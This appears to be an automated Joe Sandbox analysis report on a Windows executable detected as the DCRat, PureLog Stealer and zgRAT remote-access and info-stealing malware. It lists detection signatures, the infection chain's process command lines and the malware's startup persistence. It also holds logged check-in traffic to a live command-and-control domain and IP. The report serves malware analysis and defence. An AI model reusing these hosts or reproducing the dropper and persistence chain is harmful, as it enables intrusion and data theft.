Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kIdT4m0aa4.exe

Overview

General Information

Sample name:kIdT4m0aa4.exe
renamed because original name is a hash value
Original sample name:55A2312D6062E5BAC6C5F62A0EE42FA2.exe
Analysis ID:1507297
MD5:55a2312d6062e5bac6c5f62a0ee42fa2
SHA1:2271954571874366b20b329f202735959361a01c
SHA256:bce94981e91d899f670e4aa9b06e51f1bbff4960751481b373c119c8373ed481
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops PE files to the startup folder
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • kIdT4m0aa4.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\kIdT4m0aa4.exe" MD5: 55A2312D6062E5BAC6C5F62A0EE42FA2)
    • wscript.exe (PID: 5820 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 4928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hostcrt.exe (PID: 6488 cmdline: "C:\ProviderWebSavesNet/hostcrt.exe" MD5: 88340879F7B502B0EEE8F6147CDC70EB)
          • cmd.exe (PID: 5432 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5904 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5968 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • COBPewMCbcSeQUSyEIOt.exe (PID: 764 cmdline: "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe" MD5: 88340879F7B502B0EEE8F6147CDC70EB)
  • OpenWith.exe (PID: 1368 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • services.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" MD5: 88340879F7B502B0EEE8F6147CDC70EB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
kIdT4m0aa4.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    kIdT4m0aa4.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProviderWebSavesNet\hostcrt.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\ProviderWebSavesNet\hostcrt.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 4 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.kIdT4m0aa4.exe.67da6f2.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.kIdT4m0aa4.exe.67da6f2.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              4.0.hostcrt.exe.610000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                4.0.hostcrt.exe.610000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 3 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProviderWebSavesNet\hostcrt.exe, ProcessId: 6488, TargetFilename: C:\Users\user\Start Menu\Programs\Startup\services.exe
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , ProcessId: 4588, ProcessName: services.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kIdT4m0aa4.exe", ParentImage: C:\Users\user\Desktop\kIdT4m0aa4.exe, ParentProcessId: 3428, ParentProcessName: kIdT4m0aa4.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" , ProcessId: 5820, ProcessName: wscript.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , ProcessId: 4588, ProcessName: services.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-08T11:52:08.853157+020020480951A Network Trojan was detected192.168.2.44973880.211.144.15680TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: kIdT4m0aa4.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://304550cm.n9shka.topAvira URL Cloud: Label: malware
                                    Source: http://304550cm.n9shka.top/Avira URL Cloud: Label: malware
                                    Source: http://304550cm.n9shka.top/jspollgamesqldle.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\Desktop\TLuxYJBs.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\4sBxboqxXs.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\GcNqxydU.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\BpvsVBNg.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\FxsAqTHc.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\IuBreppm.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\OwCQqHNY.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Users\user\Desktop\TLuxYJBs.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ILIJsLjp.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JrdzzpEh.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\GcNqxydU.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BOUJPwoA.logJoe Sandbox ML: detected
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BpvsVBNg.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RIIODaxx.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\FxsAqTHc.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\OwCQqHNY.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: kIdT4m0aa4.exeJoe Sandbox ML: detected
                                    Source: kIdT4m0aa4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDirectory created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDirectory created: C:\Program Files\Microsoft\d1eeccb3e1a73cJump to behavior
                                    Source: kIdT4m0aa4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kIdT4m0aa4.exe
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh4_2_00007FFD9BC6BC7D
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh11_2_00007FFD9BC7BC7D

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 80.211.144.156:80
                                    Uses ping.exe to check the status of other devices and networks
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 380Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
